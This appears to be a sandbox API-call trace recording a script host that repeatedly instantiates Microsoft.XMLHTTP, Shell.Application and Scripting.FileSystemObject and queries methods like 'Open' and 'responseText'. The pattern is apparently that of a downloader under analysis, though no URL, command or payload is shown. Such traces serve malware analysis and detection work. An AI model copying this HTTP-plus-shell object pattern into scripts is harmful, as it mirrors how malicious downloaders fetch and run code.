	[0307.386] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0307.386] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0307.386] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0307.386] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0307.386] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0307.386] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0307.386] SysStringLen (param_1=0x0) returned 0x0
	[0307.386] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0307.387] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0307.387] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0307.387] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0307.387] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0307.387] ??2@YAPEAX_K@Z () returned 0x62f350
	[0307.387] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0307.387] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0307.387] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0307.387] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0307.387] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0307.387] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0307.387] SysStringLen (param_1=0x0) returned 0x0
	[0307.387] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0307.389] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0307.389] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0307.389] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0307.389] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0307.389] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0307.389] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0310.403] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0310.403] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0310.403] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0310.404] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.404] SysStringLen (param_1=0x0) returned 0x0
	[0310.405] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0310.405] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0310.405] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0310.405] ??2@YAPEAX_K@Z () returned 0x62f310
	[0310.405] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0310.405] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.405] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0310.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0310.405] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0310.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.405] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.408] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.408] SysStringLen (param_1=0x0) returned 0x0
	[0310.408] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0310.408] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0310.408] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0310.408] ??2@YAPEAX_K@Z () returned 0x62f330
	[0310.408] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.409] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0310.409] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.409] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.409] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.409] SysStringLen (param_1=0x0) returned 0x0
	[0310.409] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0310.409] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0310.409] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0310.410] ??2@YAPEAX_K@Z () returned 0x62f310
	[0310.410] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f310) 
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.410] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0310.410] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.410] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.410] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.410] SysStringLen (param_1=0x0) returned 0x0
	[0310.410] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0310.410] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0310.410] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.410] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0310.411] ??2@YAPEAX_K@Z () returned 0x62f330
	[0310.411] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0310.411] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.411] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0310.411] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0310.411] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0310.411] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.411] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.411] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.411] longjmp () 
	[0310.411] longjmp () 
	[0310.411] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.411] SysStringLen (param_1=0x0) returned 0x0
	[0310.411] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
